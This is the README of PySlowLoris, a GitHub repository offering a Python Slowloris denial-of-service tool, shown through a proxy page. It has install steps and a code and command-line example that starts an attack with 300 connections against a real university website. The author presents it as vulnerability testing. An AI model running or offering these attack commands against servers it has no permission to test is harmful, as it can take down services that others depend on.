Content-Length: 322483 | pFad | http://github.com/maxkrivich/SlowLoris/tree/0.1.29.2

6F GitHub - maxkrivich/SlowLoris at 0.1.29.2
Skip to content

maxkrivich/SlowLoris

Repository files navigation

PySlowLoris

Gitter chat License Python Build Status Coverage Status Requirements Status Code Health

This repository was created for testing Slow Loris vulnerability on different web servers. SL based on keeping alive open connection as long as possible and sending some trash headers to the server. If you are interested what I'm trying doing here, please join my team and let's do fun together. Please DO NOT use this in the real attacks on the servers.

The main reason why I'm writing this module it is to create the easy tool for the fast check a small personal or corporate web server what based on Apache and etc. Also, last but not least reason is to improve my skills in this sphere.

More information you can find here.

Install module

PyPi

Installing module form PyPi:

$ pip install pyslowloris
Docker

Pulling from Docker hub:

$ docker pull maxkivich/pyslowloris
$ docker run --rm -it maxkivich/pyslowloris [-h] [-u URL] [-p PORT] [-s SOCKET_COUNT]

Build from Dockerfile:

$ docker build -t pyslowloris .
$ docker run --rm -it pyslowloris [-h] [-u URL] [-p PORT] [-s SOCKET_COUNT]
For contributors
$ git clone https://github.com/maxkrivich/SlowLoris.git
$ cd SlowLoris
$ vitualenv --python=[python version] venv
$ source venv/bin/active
$ pip install --editable .

Usage

usage: slowloris [-h] [-u URL] [-s SOCKET_COUNT] [-p PORT]

Small and simple tool for testing Slow Loris vulnerability @maxkrivich

optional arguments:
  -h, --help            Show this help message and exit
  -u URL, --url URL     Link to the web server (http://google.com) - str
  -s SOCKET_COUNT, --socket-count SOCKET_COUNT Maximum count of created connection (default value
                        300) - int
  -p PORT, --port PORT  Port what will be used - int
Code example

Here are some example to start attack via Python

import time
from PySlowLoris import TargetInfo, SlowLorisAttack

target = TargetInfo(url="http://kpi.ua/", port=80)
target.get_info()
slowloris = SlowLorisAttack(target)
slowloris.start_attack() # stop_attack()

while True:
    time.sleep(1)
Using module via CLI

The following command helps to use module via command line

$ slowloris -u http://kpi.ua/ -s 300
stop execution: Ctrl + C

If you find bugs or have suggestions about improving the module, don't hesitate to contact me.

License

Copyright (c) 2017 Maxim Krivich, maxkrivich.github.io

Licensed under the MIT License









ApplySandwichStrip

pFad - (p)hone/(F)rame/(a)nonymizer/(d)eclutterfier!      Saves Data!


--- a PPN by Garber Painting Akron. With Image Size Reduction included!

Fetched URL: http://github.com/maxkrivich/SlowLoris/tree/0.1.29.2

Alternative Proxies:

Alternative Proxy

pFad Proxy

pFad v3 Proxy

pFad v4 Proxy